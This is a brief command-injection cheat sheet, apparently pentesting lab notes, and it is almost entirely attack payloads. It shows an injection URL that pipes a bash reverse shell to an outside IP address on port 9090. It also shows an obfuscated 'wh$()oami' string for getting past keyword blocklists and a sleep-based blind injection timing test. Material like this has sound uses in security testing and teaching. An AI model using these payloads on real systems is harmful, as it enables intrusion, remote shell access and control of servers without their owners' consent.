Typical Input Normalization - Sending Clean Payloads
Original Payload: This payload contains bad characters & we must encoded it using burb suit.
http://example.com/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >&/dev/tcp/192.168.x.x/9090 0>&1'
Typical Input Sanitization - Blocklisted Strings Bypass
Original Payload that gets blocked
whoami
Obfuscated Payload that gets executed
wh$()oami
Blind OS Command Injection Bypass
Calculate the time without command injected
time curl "http://example.com/php/blind.php?ip=127.0.0.1"
Calculate the time with command injected
time curl "http://example.com/php/blind.php?ip=127.0.0.1;sleep%2020"